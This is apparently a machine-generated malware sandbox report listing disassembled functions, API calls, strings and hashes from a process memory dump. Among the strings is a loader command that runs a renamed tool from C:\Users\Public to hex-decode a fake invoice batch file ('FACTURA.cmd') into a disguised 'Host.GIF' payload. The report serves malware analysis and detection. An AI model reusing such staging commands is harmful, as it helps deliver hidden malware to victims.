                                                                                      • Instruction ID: 223338f66ac182b6fe253580f4344d528b3ec1d2c9ac7d103a6c1a589678a358
                                                                                      • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                      • Instruction Fuzzy Hash: DCA1A562708BC18AEFB5AF30D8902E9B7A9FB89785F804035D94E5BB49DF3CD6058710
                                                                                      Function 00007FF793749400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                      • String ID: FAT$~
                                                                                      • API String ID: 2238823677-1832570214
                                                                                      • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                      • Instruction ID: 8198e4c48b72c774af3f6fc8436c78d9fbe41a1efb4169172e41073dcd264beb
                                                                                      • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                      • Instruction Fuzzy Hash: 82718E32709BC289EBB5AF3198842E9B7A9FB49785F804035DA4D5BB58DF38D2458710
                                                                                      Function 00007FF79374D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D884
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D89D
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D94D
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D964
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF79374DB89
                                                                                      • wcstol.MSVCRT ref: 00007FF79374DBDF
                                                                                      • wcstol.MSVCRT ref: 00007FF79374DC63
                                                                                      • memmove.MSVCRT ref: 00007FF79374DD33
                                                                                      • memmove.MSVCRT ref: 00007FF79374DE9A
                                                                                      • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374DF1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                      • String ID:
                                                                                      • API String ID: 1051989028-0
                                                                                      • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                      • Instruction ID: fab455fc017ba02eb177592615c39f33e4931f2539932c807144c67c8ef4e253
                                                                                      • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                      • Instruction Fuzzy Hash: DF028532A0879181FBB46F24E488279F6AAFB49B94F944235DADD23795DF3CE441C720
                                                                                      Function 00007FF79376BFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937558E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF79376C6DB), ref: 00007FF7937558EF
                                                                                        • Part of subcall function 00007FF79375081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79375084E
                                                                                      • towupper.MSVCRT ref: 00007FF79376C1C9
                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79376C31C
                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF79376C5CB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                      • String ID: %s $%s>$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3 $PROMPT$Unknown$\$x
                                                                                      • API String ID: 2242554020-112758507
                                                                                      • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                      • Instruction ID: 5770d6c6104dd53b61e9f910846d888cf562292dd75a5cb9a66430980dd53fab
                                                                                      • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                      • Instruction Fuzzy Hash: 6612B625A08A4381EAB4BB3594A417AB7A8EF4CB94FD40236D95E637E4CF3DE501C721
                                                                                      Function 00007FF793756FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                      • String ID: \\.\
                                                                                      • API String ID: 799470305-2900601889
                                                                                      • Opcode ID: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                                                                      • Instruction ID: 78fcfda04d286d8d36307b4547c840b4ee343c0d416eac75f61e97e796b4fb34
                                                                                      • Opcode Fuzzy Hash: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                                                                      • Instruction Fuzzy Hash: 6C51C632A08AC2D5EBB4AF3098802B9B7A8FB8DB44F854432DA0E57794DF3CD5458360
                                                                                      Function 00007FF793745458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937454DE
                                                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79374552B
                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79374554F
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79376345F
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79376347E
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF7937634C3
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937634DB
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF7937634FA
                                                                                        • Part of subcall function 00007FF7937536EC: _get_osfhandle.MSVCRT ref: 00007FF793753715
                                                                                        • Part of subcall function 00007FF7937536EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793753770
                                                                                        • Part of subcall function 00007FF7937536EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793753791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1356649289-0
                                                                                      • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                      • Instruction ID: c000d74624fd621b7466c00a574dfc986b737c201593487bc6bb37929b778517
                                                                                      • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                      • Instruction Fuzzy Hash: 6B917F21A08A4687F6B4AF31A494179F6E9FB8CB95F844135DA4E537A1DF3CE440CB20
                                                                                      Function 00007FF7937414E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                      • String ID: :$\
                                                                                      • API String ID: 3961617410-1166558509
                                                                                      • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                      • Instruction ID: fa47087e754129d80a86fc7e85d01821bd6395d66f91e657b4b3b4f8eceb8644
                                                                                      • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                      • Instruction Fuzzy Hash: FF216021A0C64287F7F07B70A4C81B9F6A6EB4DB95BC48135D91F92390DF3CE5458A61
                                                                                      Function 00007FF793770C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                      • API String ID: 2516562204-381716982
                                                                                      • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                      • Instruction ID: aa7d0cb0eac1dd73118cf42449474f98e79b04eaa4e146037dd7c3d2932e6f8f
                                                                                      • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                      • Instruction Fuzzy Hash: 5CC1B332A1475186EBA4AF35E88027DB7A9FB48B95F841135DE8E23B94DF3CE451C710
                                                                                      Function 00007FF79376A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                      • API String ID: 1580871199-2613899276
                                                                                      • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                      • Instruction ID: 1921bc16ed3cf21867fa327457d1339c8256a6163ee221cf4e34f866a4cf1b5e
                                                                                      • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                      • Instruction Fuzzy Hash: 9551D671A18B8282EBB09B35E890179B7B8FB8CB85F845135DA5E23744DF3CD501C761
                                                                                      Function 00007FF793747420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                      • String ID: con
                                                                                      • API String ID: 689241570-4257191772
                                                                                      • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                      • Instruction ID: 4f2d9c250f1c328cb953fb397fb5bc3b1e5c410440253738f46b4d7f91ead79a
                                                                                      • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                      • Instruction Fuzzy Hash: EE41C731A08B4586E260AF25A484379FA99F74DBA5F958334DA6E233D0CF3CD949C750
                                                                                      Function 00007FF79376D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                      • String ID:
                                                                                      • API String ID: 3192234081-0
                                                                                      • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                      • Instruction ID: 0ff2e558aa32c9a2f44fb95e8a05f1cbb21c371eb831963e6b91deebce412738
                                                                                      • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                      • Instruction Fuzzy Hash: B931AF31708A418BF7A0AF31A48467DFBA5FB8DB85F849134DE8A57791CE3CE4018B10
                                                                                      Function 00007FF79376EC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                      • String ID:
                                                                                      • API String ID: 920682188-0
                                                                                      • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                      • Instruction ID: 60605cfaa44b2aa2c4fd0b36cf9ab0f546ef366af94a0034af23d099fcbf00aa
                                                                                      • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                      • Instruction Fuzzy Hash: E3512732705B818AEB75EF20D8942E8B7A5FB8CB85F848135CA4E57754DF3CD6458720
                                                                                      Function 00007FF793751FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcsspn
                                                                                      • String ID:
                                                                                      • API String ID: 3809306610-0
                                                                                      • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                      • Instruction ID: 2dafa4c9f4fa41df8e9d50d18ab67f79814cd1a48ef63879ecfecb84a0e62c57
                                                                                      • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                      • Instruction Fuzzy Hash: FEB19662A0874681EAA4EF25E490279E7A9FB5CB80FC58032DA4E67791DF7CE441C720
                                                                                      Function 00007FF793768C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
